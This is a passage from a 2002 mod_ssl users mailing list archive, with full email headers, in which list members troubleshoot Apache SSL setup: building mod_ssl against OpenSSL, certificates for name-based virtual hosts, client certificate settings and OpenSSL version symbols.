                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 09:23:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA19555; Fri, 28 Jun 2002 09:22:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.virginia.edu id JAA19474; Fri, 28 Jun 2002 09:21:51 +0200 (MET DST)
Received: from node14.unix.virginia.edu by mail.virginia.edu id aa04175;
          28 Jun 2002 3:21 EDT
Received: from localhost (jcw5q@localhost)
	by node14.unix.Virginia.EDU (8.9.3/8.9.3) with ESMTP id DAA42064
	for ; Fri, 28 Jun 2002 03:21:49 -0400
X-Authentication-Warning: node14.unix.Virginia.EDU: jcw5q owned process doing -bs
Date: Fri, 28 Jun 2002 03:21:49 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender:  
To: modssl-users@modssl.org
MMDF-Warning:  Parse error in original version of preceding line at mail.virginia.edu
Subject: Re: SSLCryptoDevice: works as a static, not as a DSO...?
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 28 Jun 2002, R. DuFresne wrote:

> I was thinking, and perhaps wrongly for versions prior to apache 2, that
> modules required openssl be shared, but, earlier mod-ssl based versions I
> do not think were so limited, being how they were built with ssl support.

Right.  That's not a restriction in 1.3 as far as I know.  Just 2.0 (due
to libtool).

For 2.0, if you want a shared mod_ssl, use a shared OpenSSL, and if you
want a static mod_ssl, use a static OpenSSL.  1.3 should be a bit more
flexible there.  We'll get around to fixing that in 2.0 one of these days.
:-/

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 11:21:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA01555; Fri, 28 Jun 2002 11:20:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cmailg3.svr.pol.co.uk id LAA01491; Fri, 28 Jun 2002 11:19:39 +0200 (MET DST)
Received: from modem-582.bellsprout.dialup.pol.co.uk ([217.135.39.70] helo=STILL1)
	by cmailg3.svr.pol.co.uk with smtp (Exim 3.35 #1)
	id 17Nruh-0002Eg-00
	for modssl-users@modssl.org; Fri, 28 Jun 2002 10:19:36 +0100
From: "Jon Still" 
To: 
Subject: Certificate config problem
Date: Fri, 28 Jun 2002 10:16:41 +0100
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0001_01C21E8C.E5593A40"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jon Still" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0001_01C21E8C.E5593A40
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Hi all,

Apologies if this has been asked before - I'm very new to this list.

I'm running Apache 1.3.26 with mod-ssl 2.8.9-1.3.26.  There are many domains
on the box in question (40ish) and 2 of them use SSL.  For the sake of
argument let's call them example.com and example2.com - these are both
name-based virtual servers.

I've created certificates for them using the ssl.ca package - I created my
own root CA and then generated/signed certificates for both domains,
providing the correct CN in each case.

So we have example.com CA key signing server certificates for
www.example.com and www.example2.com.

Whenever I go to https://www.example.com/ - it works great.  No problems
whatsoever.  However with https://www.example2.com/ it seems to be using the
certificate for www.example.com - IE pops up the error saying that the name
on the cert doesn't match the site name.

The thing that is baffling me is that this *did* work at one point.  I first
set up SSL and got it working perfectly for both domains around about July
last year - using whatever was the latest version at that point.

The ssl_engine_log file shows the following for a request for a single HTML
file on www.example2.com

[28/Jun/2002 10:14:04 01309] [info]  Connection to child 6 established
(server www.example.com:443, client 217.135.39.70)
[28/Jun/2002 10:14:04 01309] [info]  Seeding PRNG with 23177 bytes of
entropy
[28/Jun/2002 10:14:04 01309] [info]  Connection: Client IP: 217.135.39.70,
Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
[28/Jun/2002 10:14:04 01309] [info]  Connection to child 6 closed with
standard shutdown (server www.example.com:443, client 217.135.39.70)
[28/Jun/2002 10:14:06 01310] [info]  Connection to child 7 established
(server www.example.com:443, client 217.135.39.70)
[28/Jun/2002 10:14:06 01310] [info]  Seeding PRNG with 23177 bytes of
entropy
[28/Jun/2002 10:14:07 01310] [info]  Connection: Client IP: 217.135.39.70,
Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
[28/Jun/2002 10:14:07 01310] [info]  Initial (No.1) HTTPS request received
for child 7 (server www.example2.com:443)
[28/Jun/2002 10:14:07 01310] [info]  Connection to child 7 closed with
unclean shutdown (server www.example2.com:443, client 217.135.39.70)

THe useful parts of my httpd.conf are in the attached file.

If anyone could help with this I'd be extremely grateful.

Cheers,
Jon.

------=_NextPart_000_0001_01C21E8C.E5593A40
Content-Type: text/plain;
	name="ssl-conf.txt"
Content-Disposition: attachment;
	filename="ssl-conf.txt"
Content-Transfer-Encoding: quoted-printable

Port 80
User nobody
Group nobody
ServerAdmin webmaster@example.com
ServerName www.example.com
DocumentRoot "/home/httpd/html"

## SSL Global Stuff

AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl
Listen x.x.x.x:80
Listen x.x.x.x:443
Listen x.x.x.y:80




SSLPassPhraseDialog  builtin
#SSLSessionCache        none
#SSLSessionCache        shmht:logs/ssl_scache(512000)
#SSLSessionCache        shmcb:logs/ssl_scache(512000)
SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300

SSLMutex  file:logs/ssl_mutex

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
#SSLRandomSeed startup file:/dev/random  512
#SSLRandomSeed startup file:/dev/urandom 512
#SSLRandomSeed connect file:/dev/random  512
#SSLRandomSeed connect file:/dev/urandom 512

SSLLog      logs/ssl_engine_log
SSLLogLevel info



### Section 3: Virtual Hosts
NameVirtualHost x.x.x.x:80
NameVirtualHost x.x.x.x:443


#
#


DocumentRoot /home/httpd/html
ServerName www.example.com
...



DocumentRoot /home/httpd/html
ServerName www.example.com
...

SSLEngine on
SSLCipherSuite =
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /etc/httpd/conf/www.example.com.crt
SSLCertificateKeyFile /etc/httpd/conf/www.example.com.key


    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


SetEnvIf User-Agent ".*MSIE.*" \
  nokeepalive ssl-unclean-shutdown \
  downgrade-1.0 force-response-1.0




DocumentRoot /home/jon/domains/example2.com
ServerName www.example2.com
ServerAdmin webmaster@example2.com
...



DocumentRoot /home/jon/domains/example2.com
ServerName www.example2.com
ServerAdmin webmaster@example2.com
...

SSLEngine on
SSLCipherSuite =
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /etc/httpd/conf/www.example2.com.crt
SSLCertificateKeyFile /etc/httpd/conf/www.example2.com.key


    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0




------=_NextPart_000_0001_01C21E8C.E5593A40--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 11:31:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA02585; Fri, 28 Jun 2002 11:30:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bouba.alxhost.com id LAA02521; Fri, 28 Jun 2002 11:29:48 +0200 (MET DST)
Received: from [212.162.175.101] (helo=lusidor2002.lusidor.com)
	by bouba.alxhost.com with esmtp (Exim 3.35 #1)
	id 17Ns4H-0005kp-00
	for modssl-users@modssl.org; Fri, 28 Jun 2002 05:29:29 -0400
Message-Id: <5.1.0.14.0.20020628112816.00be6d10@mail.lusidor.com>
X-Sender: lusidor@mail.lusidor.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Fri, 28 Jun 2002 11:29:49 +0200
To: modssl-users@modssl.org
From: Jimmy Lantz 
Subject: Re: Certificate config problem
In-Reply-To: 
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - bouba.alxhost.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [0 0]
X-AntiAbuse: Sender Address Domain - lusidor.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jimmy Lantz 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Jon!
Your problem lies in that you have name-based and not IP based virtual host 
for the ssl ones!
The faq at modssl explains better why....
change it to 2 ip based and your in the clear!
/ HTH
Jimmy

At 10:16 2002-06-28 +0100, you wrote:
>Hi all,
>
>Apologies if this has been asked before - I'm very new to this list.
>
>I'm running Apache 1.3.26 with mod-ssl 2.8.9-1.3.26.  There are many domains
>on the box in question (40ish) and 2 of them use SSL.  For the sake of
>argument let's call them example.com and example2.com - these are both
>name-based virtual servers.
>
>I've created certificates for them using the ssl.ca package - I created my
>own root CA and then generated/signed certificates for both domains,
>providing the correct CN in each case.
>
>So we have example.com CA key signing server certificates for
>www.example.com and www.example2.com.
>
>Whenever I go to https://www.example.com/ - it works great.  No problems
>whatsoever.  However with https://www.example2.com/ it seems to be using the
>certificate for www.example.com - IE pops up the error saying that the name
>on the cert doesn't match the site name.
>
>The thing that is baffling me is that this *did* work at one point.  I first
>set up SSL and got it working perfectly for both domains around about July
>last year - using whatever was the latest version at that point.
>
>The ssl_engine_log file shows the following for a request for a single HTML
>file on www.example2.com
>
>[28/Jun/2002 10:14:04 01309] [info]  Connection to child 6 established
>(server www.example.com:443, client 217.135.39.70)
>[28/Jun/2002 10:14:04 01309] [info]  Seeding PRNG with 23177 bytes of
>entropy
>[28/Jun/2002 10:14:04 01309] [info]  Connection: Client IP: 217.135.39.70,
>Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
>[28/Jun/2002 10:14:04 01309] [info]  Connection to child 6 closed with
>standard shutdown (server www.example.com:443, client 217.135.39.70)
>[28/Jun/2002 10:14:06 01310] [info]  Connection to child 7 established
>(server www.example.com:443, client 217.135.39.70)
>[28/Jun/2002 10:14:06 01310] [info]  Seeding PRNG with 23177 bytes of
>entropy
>[28/Jun/2002 10:14:07 01310] [info]  Connection: Client IP: 217.135.39.70,
>Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
>[28/Jun/2002 10:14:07 01310] [info]  Initial (No.1) HTTPS request received
>for child 7 (server www.example2.com:443)
>[28/Jun/2002 10:14:07 01310] [info]  Connection to child 7 closed with
>unclean shutdown (server www.example2.com:443, client 217.135.39.70)
>
>THe useful parts of my httpd.conf are in the attached file.
>
>If anyone could help with this I'd be extremely grateful.
>
>Cheers,
>Jon.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 12:34:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA09169; Fri, 28 Jun 2002 12:33:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA09152; Fri, 28 Jun 2002 12:33:11 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id EDE824CE754; Fri, 28 Jun 2002 12:33:10 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 264CC2882A; Fri, 28 Jun 2002 11:05:50 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from raq76.uk2net.com.local id KAA25926; Fri, 28 Jun 2002 10:25:04 +0200 (MET DST)
Received: from comice ([62.189.189.147])
	by raq76.uk2net.com.local (8.9.3/8.9.3) with ESMTP id JAA00859
	for ; Fri, 28 Jun 2002 09:25:02 +0100
From: "Jeff Aqua" 
To: 
Subject: RE: CLient/Server Certificates
Date: Fri, 28 Jun 2002 09:25:03 +0100
Message-ID: <001801c21e7d$50dd9780$3864a8c0@comice>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Aqua" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> -----Original Message-----
> From: owner-modssl-users@modssl.org 
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Saunders Jack
> Sent: 27 June 2002 19:55
> To: 'modssl-users@modssl.org'
> Subject: CLient/Server Certificates
> 
> 
> I am running Apache 1.3.26 with mod_ssl/openssl.  I have 
> configured a server certificate from versign and https 
> communication works great.  However I am trying to now 
> configure client certs.  I have configured apache to trust 
> the CA.  But now if I have a browser that tries a https 
> connection without a certificate imported in the browser I 
> get a page cannot be found error.  How can both types of 
> certificates exist in apache without stopping https 
> communication for everyone.  Some resources will use server 
> to browser 128 bit encryption and others may require client certs.
> 
> Thanks

Client and Server certificates co-reside happily without problems.

Sounds like you need to look at your SSL settings for the client
certs in httpd.conf. You probably have something like

  SSLVerifyClient require

which means a client certificate is REQUIRED for access.
Try setting this to
  
  SSLVerifyClient optional

which means you will get a certificate if the user has one, and
they decide to let you see it. Either way, they get access.

Regards
Jeff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 15:54:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA29552; Fri, 28 Jun 2002 15:53:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cpemail1.silverbacktech.com id PAA29475; Fri, 28 Jun 2002 15:52:11 +0200 (MET DST)
Received: from kashmir.silverbacktech.com (kashmir [38.151.210.37])
	by cpemail1.silverbacktech.com (8.11.6/8.11.6) with ESMTP id g5SDq5h07290
	for ; Fri, 28 Jun 2002 09:52:05 -0400
Received: by kashmir.silverbacktech.com with Internet Mail Service (5.5.2653.19)
	id ; Fri, 28 Jun 2002 09:45:15 -0400
Message-ID: 
From: Noah White 
To: "'modssl-users@modssl.org'" 
Subject: RE: Certificate config problem
Date: Fri, 28 Jun 2002 09:45:04 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Noah White 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


I noticed you said you used the ssl.ca package to create a root CA etc. What
is this package and where can I get it?

The issue I am running into is similar. I produced self sighed certs using
openssl but when I connect to the site with IE since it isn't in its root CA
list I get the pop-up saying its untrusted. 

Did you get around this? If so how? Thanks much.

-Noah

> -----Original Message-----
> From: Jon Still [mailto:jon-pop@tertial.org]
> Sent: Friday, June 28, 2002 5:17 AM
> To: modssl-users@modssl.org
> Subject: Certificate config problem
> 
> Hi all,
> 
> Apologies if this has been asked before - I'm very new to this list.
> 
> I'm running Apache 1.3.26 with mod-ssl 2.8.9-1.3.26.  There are many
> domains
> on the box in question (40ish) and 2 of them use SSL.  For the sake of
> argument let's call them example.com and example2.com - these are both
> name-based virtual servers.
> 
> I've created certificates for them using the ssl.ca package - I created my
> own root CA and then generated/signed certificates for both domains,
> providing the correct CN in each case.
> 
> So we have example.com CA key signing server certificates for
> www.example.com and www.example2.com.
> 
> Whenever I go to https://www.example.com/ - it works great.  No problems
> whatsoever.  However with https://www.example2.com/ it seems to be using
> the
> certificate for www.example.com - IE pops up the error saying that the
> name
> on the cert doesn't match the site name.
> 
> The thing that is baffling me is that this *did* work at one point.  I
> first
> set up SSL and got it working perfectly for both domains around about July
> last year - using whatever was the latest version at that point.
> 
> The ssl_engine_log file shows the following for a request for a single
> HTML
> file on www.example2.com
> 
> [28/Jun/2002 10:14:04 01309] [info]  Connection to child 6 established
> (server www.example.com:443, client 217.135.39.70)
> [28/Jun/2002 10:14:04 01309] [info]  Seeding PRNG with 23177 bytes of
> entropy
> [28/Jun/2002 10:14:04 01309] [info]  Connection: Client IP: 217.135.39.70,
> Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
> [28/Jun/2002 10:14:04 01309] [info]  Connection to child 6 closed with
> standard shutdown (server www.example.com:443, client 217.135.39.70)
> [28/Jun/2002 10:14:06 01310] [info]  Connection to child 7 established
> (server www.example.com:443, client 217.135.39.70)
> [28/Jun/2002 10:14:06 01310] [info]  Seeding PRNG with 23177 bytes of
> entropy
> [28/Jun/2002 10:14:07 01310] [info]  Connection: Client IP: 217.135.39.70,
> Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
> [28/Jun/2002 10:14:07 01310] [info]  Initial (No.1) HTTPS request received
> for child 7 (server www.example2.com:443)
> [28/Jun/2002 10:14:07 01310] [info]  Connection to child 7 closed with
> unclean shutdown (server www.example2.com:443, client 217.135.39.70)
> 
> THe useful parts of my httpd.conf are in the attached file.
> 
> If anyone could help with this I'd be extremely grateful.
> 
> Cheers,
> Jon.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 16:06:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA00994; Fri, 28 Jun 2002 16:05:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from imailg1.svr.pol.co.uk id QAA00752; Fri, 28 Jun 2002 16:03:40 +0200 (MET DST)
Received: from modem-356.ballistic.dialup.pol.co.uk ([62.25.137.100] helo=STILL1)
	by imailg1.svr.pol.co.uk with smtp (Exim 3.35 #1)
	id 17NwLb-0000wT-00
	for modssl-users@modssl.org; Fri, 28 Jun 2002 15:03:39 +0100
From: "Jon Still" 
To: 
Subject: RE: Certificate config problem
Date: Fri, 28 Jun 2002 15:00:43 +0100
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
In-Reply-To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jon Still" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Noah,

> I noticed you said you used the ssl.ca package to create a root
> CA etc. What
> is this package and where can I get it?

The ssl.ca package is essentially a set of openssl wrapper scripts for
acting as a simple CA.  It just saves you having to remember the complicated
openssl commands to gen/sign certs.

http://www.openssl.org/contrib/

> The issue I am running into is similar. I produced self sighed certs using
> openssl but when I connect to the site with IE since it isn't in
> its root CA
> list I get the pop-up saying its untrusted.

You will *still* have the issue with IE because your root CA is not
recognised by the browser.  You *can* however take the ca.crt file produced
by ssl.ca/openssl and import this into IE.  This will prevent the error
message that there is no certification chain.

Hope this helps.

Cheers,
Jon.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 16:47:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA05227; Fri, 28 Jun 2002 16:46:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA05135; Fri, 28 Jun 2002 16:45:48 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 15E1F4CE796; Fri, 28 Jun 2002 16:45:46 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id C0D53285D3; Fri, 28 Jun 2002 16:40:59 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from bradbury.tivano.net id OAA19284; Fri, 28 Jun 2002 14:10:43 +0200 (MET DST)
Received: (qmail 18163 invoked by uid 504); 28 Jun 2002 12:10:41 -0000
Received: from conrad@tivano.de by shakespeare by uid 501 with qmail-scanner-1.11 (iscan: v3.1/v6.150-1001/269/45927. . Clear:. Processed in 0.194239 secs); 28 Jun 2002 12:10:41 -0000
Received: from dante.tivano.net (HELO ) (217.89.32.67)
  by bradbury.tivano.net with SMTP; 28 Jun 2002 12:10:41 -0000
Received: (qmail 18444 invoked by uid 1000); 28 Jun 2002 12:10:36 -0000
Date: Fri, 28 Jun 2002 14:10:36 +0200
From: Peter Conrad 
To: modssl-users@modssl.org
Subject: sk_new_null
Message-ID: <20020628141036.B20873@tivano.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Conrad 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

the function sk_new_null, used by modssl since 2.8.10, is only present in
OpenSSL releases >= 0.9.6. Trying to run Apache with modssl and OpenSSL-0.9.5
(e. g. on a SuSE 7.0) doesn't work because the symbol can't be found.

The INSTALL file coming with modssl 2.8.10 says openssl-0.9.x, which is
at least a documentation bug, IMO.

Bye,
	Peter
-- 
Peter Conrad                        Tel: +49 6102 / 80 99 072
[ t]ivano Software GmbH             Fax: +49 6102 / 80 99 071
Bahnhofstr. 18
63263 Neu-Isenburg
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 17:22:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA10663; Fri, 28 Jun 2002 17:21:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from relais.videotron.ca id RAA10602; Fri, 28 Jun 2002 17:21:07 +0200 (MET DST)
Received: from toilet ([24.202.164.28]) by relais.videotron.ca
          (Videotron-Netscape Messaging Server v4.15 MTA-PRD2) with ESMTP
          id GYF9B602.2GM for ; Fri, 28 Jun 2002
          11:21:06 -0400 
Received: from toilet
	([127.0.0.1] helo=localhost ident=geoff)
	by toilet with esmtp (Exim 3.35 #1 (Debian))
	id 17NxYX-00008y-00; Fri, 28 Jun 2002 11:21:05 -0400
Date: Fri, 28 Jun 2002 11:21:04 -0400 (EDT)
From: Geoff Thorpe 
X-X-Sender: geoff@toilet.localnet
To: modssl-users@modssl.org
Subject: Re: SSLCryptoDevice: works as a static, not as a DSO...?
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi there,

On Fri, 28 Jun 2002, James Bromberger wrote:

> Thanks Ron... I just did this, and there was no change -- it still
> doesn't like this directive:
> 	Invalid command 'SSLCryptoDevice', perhaps mis-spelled
> 	or defined by a module not included in the server configuration

[snip]

> The difference I am doing is removing the "--enable-shared=ssl" and
> "--enable-shared=max", and then it works (as a static).

I can't comment too directly on the build environment of apache/mod_ssl in
terms of shared/static loading, it's a bit of a minefield, especially when
you introduce solaris into the already muddied waters of portable
module-building ...

Nonetheless, I seem to recall seeing somewhere that you can't build a
mod_ssl DSO using a static openssl library. That could be a confusion of
a distant memory, or it could be just plain and completely wrong, however
it might be worth looking into.

As someone I think already mentioned, the only way you should get that
message from mod_ssl configuration is if you didn't build with
SSL_EXPERIMENTAL. If you did, mod_ssl should understand that directive -
and any failures to load/link against ENGINE-specific API calls would
manifest themselves in different ways (compiler-time or run-time linker
failures). OTOH: It's possible mod_ssl's "./configuration" might have
caused ENGINE support to be surpressed ... I don't recall much about
Ralf's configuration script, but this might be possible if he probes the
openssl libs for ENGINE support ...

Which versions of OpenSSL are you working with? Did you compile it(/them)
yourself or are you using existing packages? If you did compile them, do
you also have other system-wide versions installed? When building static
or shared (DSO) versions of mod_ssl, which forms (shared/static) of
openssl are you using?

Cheers,
Geoff

PS: This could also be something in the configuration/invocation of
apache/mod_ssl ... have you tried doing precisely the same thing on
something other than solaris to see? If you get the same error on linux,
freebsd, etc then it probably has nothing to do with compilation issues.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 19:02:40 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA21263; Fri, 28 Jun 2002 19:01:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mm02snlnto.sandia.gov id TAA21213; Fri, 28 Jun 2002 19:00:42 +0200 (MET DST)
Received: from 132.175.109.4 by mm02snlnto.sandia.gov with ESMTP (
 Tumbleweed MMS SMTP Relay (MMS v4.7)); Fri, 28 Jun 2002 10:58:15 -0600
X-Server-Uuid: 95b8ca9b-fe4b-44f7-8977-a6cb2d3025ff
Received: from ES01SNLNT.sandia.gov (es01snlnt.sandia.gov
 [134.253.130.4]) by mailgate2.sandia.gov (8.12.3/8.12.3) with ESMTP id
 g5SH0c2B024791 for ; Fri, 28 Jun 2002 11:00:38
 -0600 (MDT)
Received: by ES01SNLNT.sandia.gov with Internet Mail Service (
 5.5.2653.19) id ; Fri, 28 Jun 2002 11:00:37 -0600
Message-ID: 
From: "Ashmore, Samuel R" 
To: "'modssl-users@modssl.org'" 
Subject: certificate data
Date: Fri, 28 Jun 2002 11:00:36 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
X-Filter-Version: 1.8 (sass2426)
X-WSS-ID: 11024A2D512342-01-01
Content-Type: text/plain; 
 charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ashmore, Samuel R" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

how can i get the certificate from mod-ssl to another Apache module?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 23:26:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA18893; Fri, 28 Jun 2002 23:25:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP
	from traven10.uol.com.br id XAA18836; Fri, 28 Jun 2002 23:24:47 +0200 (MET DST)
Received: from denao ([192.168.209.103])
	by traven10.uol.com.br (8.9.1/8.9.1) with ESMTP id SAA17838;
	Fri, 28 Jun 2002 18:24:40 -0300 (BRT)
Subject: Re: [BugDB] Performance issue (PR#723)
From: "Denis A.V.Jr." 
To: modssl-users@modssl.org
Cc: modssl-bugdb@modssl.org
In-Reply-To: <20020624105228.A2158792@ohm.arago.de>
References: <200206212349.BAA00234@opensource.ee.ethz.ch> 
	<20020624105228.A2158792@ohm.arago.de>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Evolution/0.15 (Preview Release)
Date: 28 Jun 2002 18:21:11 -0300
Message-Id: <1025299272.706.21.camel@theblues>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Denis A.V.Jr." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I tried with the prngd and exactly the same problem appeared.
=(

Regards

On Mon, 2002-06-24 at 05:52, Thomas Binder wrote:
> Hi!
> 
